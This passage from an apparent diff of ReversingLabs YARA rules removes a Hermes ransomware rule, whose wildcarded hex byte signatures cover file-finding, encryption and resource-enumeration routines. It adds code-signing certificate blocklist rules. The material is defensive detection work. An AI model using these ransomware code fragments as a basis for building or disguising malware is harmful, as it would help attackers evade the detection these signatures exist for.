?? 48 C1 EA ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 83 F8 ?? 75 ?? 48 63 0F 4C 8D 3D ?? - ?? ?? ?? 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 ?? ?? FF 15 - ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 85 C0 75 - ?? FF 15 ?? ?? ?? ?? 8B C8 8B D8 E8 ?? ?? ?? ?? 48 63 17 4C 8D 3D ?? ?? ?? ?? 48 8B - CA 83 E2 ?? 48 C1 F9 ?? 48 8D 14 D2 49 8B 0C CF 80 64 D1 ?? ?? 49 8B CD FF 15 ?? ?? - ?? ?? 85 DB 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44 8A - 75 ?? 83 F8 ?? 75 ?? 41 80 CE ?? EB ?? 83 F8 ?? 75 ?? 41 80 CE ?? 8B 0F 49 8B D5 E8 - ?? ?? ?? ?? 48 63 0F 4C 8D 3D ?? ?? ?? ?? 48 8B C1 41 80 CE ?? 48 C1 F8 ?? 83 E1 ?? - 44 88 75 ?? 49 8B 04 C7 48 8D 0C C9 44 88 74 C8 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 - F8 ?? 48 8D 0C C9 49 8B 04 C7 40 88 74 C8 ?? 41 F6 C4 ?? 74 ?? 8B 0F E8 ?? ?? ?? ?? - 89 45 ?? 85 C0 74 ?? 8B 0F E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 0F 10 45 ?? 4C 8D - 4D ?? 8B 0F F2 0F 10 4D ?? 48 8D 55 ?? 45 8B C4 0F 29 45 ?? 40 88 75 ?? F2 0F 11 4D - ?? E8 ?? ?? ?? ?? 48 63 0F 89 45 ?? 85 C0 75 ?? 48 8B C1 48 C1 F9 ?? 83 E0 ?? 49 8B - } - $encrypt_files_p7 = { - 0C CF 48 8D 14 C0 8A 45 ?? 88 44 D1 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D - 14 C9 49 8B 0C C7 41 8B C4 C1 E8 ?? 24 ?? 80 64 D1 ?? ?? 08 44 D1 ?? 41 F6 C6 ?? 75 - ?? 41 F6 C4 ?? 74 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 - 80 4C C8 ?? ?? B9 ?? ?? ?? ?? 8B C3 23 C1 3B C1 0F 85 ?? ?? ?? ?? 41 F6 C4 ?? 0F 84 - ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8B 4D ?? 4C 8D 4D ?? 44 8B 45 ?? 0F BA F3 - ?? 48 89 74 24 ?? 89 4C 24 ?? 8B 4D ?? 89 4C 24 ?? 48 8B 4D ?? 89 5D ?? 48 8B 55 ?? - 48 C1 EA ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B C8 E8 - ?? ?? ?? ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 - ?? ?? 8B 0F E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 0F 48 8B C1 48 C1 F8 ?? 83 E1 ?? 49 - 8B 04 C7 48 8D 0C C9 48 89 54 C8 ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B - 73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="4d:29:75:7c:4f:bf:c3:2b:97:09:1d:96:e3:72:30:02" and 1474848000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Hermes : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE { meta: - description = "Yara rule that detects Hermes ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1f1f363a-5be0-59e5-b1c1-5e277922790c" - date = "2020-07-15" - modified = "2020-07-15" + id = "6ea47017-1296-5409-8ff2-ef69434233ff" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Hermes.yara#L1-L284" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6db95c422ee2f9dd8a1795031ee8d7d5ed84e16cde47512becc006b6a849e890" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15368-L15384" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "88c63a921a300e1b985d084c3ab1a2485713b4c674dafd419d092e5562f121d7" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Hermes" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $hermes_find_files_v1_p1 = { - A5 A5 A5 8D BD ?? ?? ?? ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 66 A5 68 ?? - ?? ?? ?? 8D BD ?? ?? ?? ?? 50 AB 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 65 - ?? ?? 8B 5D ?? 8B FB 4F 4F 8D 47 ?? 66 8B 4F ?? 47 47 66 85 C9 75 ?? BE ?? ?? ?? ?? - A5 A5 8D 8D ?? ?? ?? ?? 51 50 66 A5 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? E8 - ?? ?? ?? ?? 59 59 8B C8 E8 ?? ?? ?? ?? 8B CB 8B D0 E8 ?? ?? ?? ?? 2B C2 33 C9 83 7D - ?? ?? 66 89 0C 43 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? - 8B C1 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? - 8B C1 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 33 - } - $hermes_find_files_v1_p2 = { - C0 6A ?? 59 6A ?? 8D 7D ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 59 BE ?? ?? - ?? ?? 8D BD ?? ?? ?? ?? F3 A5 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 6A ?? 59 8D 7D ?? - AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? AB AB 66 AB BE ?? ?? ?? - ?? 8D 7D ?? A5 A5 A5 A5 33 C0 6A ?? 8D 7D ?? AB 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? - F3 A5 66 A5 8D BD ?? ?? ?? ?? AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 8D BD - ?? ?? ?? ?? AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 - C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 - 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 - 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D - 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 0F - } - $hermes_find_files_v1_p3 = { - 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 - 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F - 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F - 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D - } - $hermes_find_files_v1_p4 = { - 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 - ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? F6 85 - ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 F8 ?? 7E ?? 53 FF 75 - ?? FF 75 ?? E8 - } - $hermes_encrypt_files_v1_p1 = { - 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 3B C3 74 ?? 53 - FF 75 ?? FF 15 ?? ?? ?? ?? 33 F6 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? - ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 50 FF 15 ?? ?? ?? ?? 89 45 ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 56 89 45 ?? 8D 45 ?? 50 56 56 - 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? BF ?? ?? ?? ?? 57 FF 75 ?? 56 - FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? 56 8D 4D ?? 51 FF 75 ?? 89 75 ?? 50 FF 75 ?? - FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 4D ?? 8D 44 08 ?? 80 38 ?? 75 ?? 80 78 ?? - ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? FF - 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B - } - $hermes_encrypt_files_v1_p2 = { - C9 C3 FF 75 ?? 8D 45 ?? 50 51 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 - 56 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? - ?? 6A ?? 57 FF 75 ?? 88 45 ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 3B FE 74 ?? FF 75 - ?? 0F BE 45 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? 57 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 56 FF 75 ?? FF 15 - ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF - 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? FF 75 - ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? - 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 56 FF - 75 ?? FF 15 ?? ?? ?? ?? 33 C0 40 E9 - } - $hermes_enum_resources_v1 = { - 55 8B EC 83 EC ?? 53 56 57 8D 45 ?? 50 FF 75 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A - ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF - 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B - 43 ?? 66 83 38 ?? 8D 48 ?? 75 ?? 66 83 78 ?? ?? 75 ?? 6A ?? 51 E8 ?? ?? ?? ?? 59 59 - 85 C0 74 ?? 8B 43 ?? 8B D0 66 8B 08 40 40 66 85 C9 75 ?? 8B 7D ?? 2B C2 4F 4F 66 8B - 4F ?? 47 47 66 85 C9 75 ?? 8B C8 C1 E9 ?? 8B F2 F3 A5 8B C8 83 E1 ?? F3 A4 8B 7D ?? - 4F 4F 66 8B 47 ?? 47 47 66 85 C0 75 ?? BE ?? ?? ?? ?? A5 8B 43 ?? 83 E0 ?? 3C ?? 0F - 85 ?? ?? ?? ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 33 C0 5F 5E - 5B C9 C3 33 C0 40 EB - } - $hermes_encrypt_files_v2_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 C0 8D BD ?? ?? ?? ?? AB 33 DB 89 5D ?? AB AB - AB 8B 7D ?? 57 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 53 56 6A ?? - 53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 53 FF 15 ?? ?? ?? ?? 33 - C0 E9 ?? ?? ?? ?? 33 DB 33 C0 89 5D ?? 0F 57 C0 89 45 ?? 66 0F 13 45 ?? 83 FE ?? 74 - ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 45 - ?? 83 FB ?? 75 ?? 85 C0 75 ?? 33 FF 47 E9 ?? ?? ?? ?? 83 65 ?? ?? 83 7D ?? ?? 77 ?? - 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? - 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 4D ?? - 89 45 ?? 83 F9 ?? 72 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? 3D ?? ?? ?? ?? 76 ?? - C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? 8B C1 81 C2 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 77 ?? - 72 ?? 81 FA ?? ?? ?? ?? 77 ?? 6A ?? 6A ?? 51 FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 - 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 45 ?? EB ?? 83 F9 - } - $hermes_encrypt_files_v2_p2 = { - 77 ?? 72 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? 8B 45 ?? EB ?? 8B 45 ?? 3D ?? ?? ?? ?? 0F 87 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? - 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? B8 ?? ?? ?? ?? 77 ?? 39 - 45 ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 2B D8 53 56 89 5D ?? FF 15 ?? ?? ?? ?? - 83 F8 ?? 75 ?? 6A ?? 58 E9 ?? ?? ?? ?? 33 DB 8D 45 ?? 53 50 6A ?? 8D 85 ?? ?? ?? ?? - 89 5D ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? EB ?? 8B C3 80 BC 05 ?? ?? ?? ?? - ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? - ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 80 BC 05 ?? ?? ?? ?? ?? 74 ?? 40 83 F8 - ?? 72 ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? - ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 58 6A ?? 66 89 45 ?? 58 66 89 45 ?? 6A ?? 58 66 89 45 - ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 57 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 56 89 1E E8 ?? ?? ?? - ?? 57 56 E8 ?? ?? ?? ?? 8D 45 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 57 FF 15 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 33 DB 8D 45 - } - $hermes_encrypt_files_v2_p3 = { - 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? - 39 5D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 - ?? ?? ?? ?? 89 5D ?? 5B 6A ?? 89 4D ?? 33 DB 89 45 ?? 89 55 ?? 5F EB ?? 8B 45 ?? 89 - 45 ?? 53 69 C0 ?? ?? ?? ?? 53 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? E9 ?? ?? - ?? ?? 53 8D 45 ?? 89 5D ?? 50 6A ?? 5F 57 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 85 C0 75 ?? 6A ?? E9 ?? ?? ?? ?? 53 53 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? - E9 ?? ?? ?? ?? 89 5D ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B - D8 85 DB 75 ?? 6A ?? E9 ?? ?? ?? ?? 8B 55 ?? 33 C9 33 C0 C7 45 ?? ?? ?? ?? ?? 89 4D - ?? 89 45 ?? 83 65 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B CA 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? - ?? ?? ?? ?? 33 C9 51 51 50 56 89 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? - 6A ?? 8D 45 ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 C7 - } - $hermes_encrypt_files_v2_p4 = { - 45 ?? ?? ?? ?? ?? 51 8D 45 ?? 50 51 51 FF 75 ?? 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 53 6A ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F - 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 41 8B 55 ?? 05 ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B - CA 0F 86 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 7D ?? 66 C7 45 ?? ?? ?? AB AB AB - AB 66 AB 33 C0 88 45 ?? 39 45 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 8D 45 ?? 50 8D 45 - ?? 50 E8 ?? ?? ?? ?? 59 59 EB ?? 6A ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 33 C0 8D 7D ?? - AB 6A ?? AB 66 AB 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 FF 8D 45 ?? 57 50 8D - 45 ?? 89 7D ?? 50 E8 ?? ?? ?? ?? 59 50 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? - 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 57 57 6A - } - $hermes_encrypt_files_v2_p5 = { - FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? - ?? 6A ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 57 6A ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 - C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 57 8D 45 ?? 89 - 7D ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? - ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 39 7D ?? 77 ?? 81 7D ?? ?? ?? ?? ?? - 76 ?? 6A ?? 57 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 - ?? 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? EB ?? 57 8D 45 ?? 89 7D ?? 50 - 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF - 15 ?? ?? ?? ?? 6A ?? EB ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? - 83 C4 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? 5B EB ?? 68 ?? ?? ?? ?? 6A ?? - 53 FF 15 ?? ?? ?? ?? 6A ?? 5B 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B C3 - EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? - ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? - ?? ?? 6A ?? 5F EB ?? 6A ?? 5F 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? EB ?? 6A ?? E9 ?? ?? ?? ?? 6A ?? 5F 56 FF 15 ?? - ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $hermes_find_files_v2_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 85 ?? ?? ?? ?? 56 57 50 68 ?? ?? ?? ?? 53 - E8 ?? ?? ?? ?? 59 59 50 FF 15 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 53 89 7D ?? E8 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 53 8B F0 E8 ?? ?? ?? ?? 2B C6 33 C9 83 C4 ?? 66 89 0C 43 83 - FF ?? 0F 84 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 F8 ?? 75 ?? - 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 - F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D - 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 6A ?? 5F 6A - ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 59 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? - 66 89 45 ?? 33 C0 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 - } - $hermes_find_files_v2_p2 = { - 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 45 ?? 58 6A ?? 66 89 45 - ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 55 ?? - 66 89 55 ?? 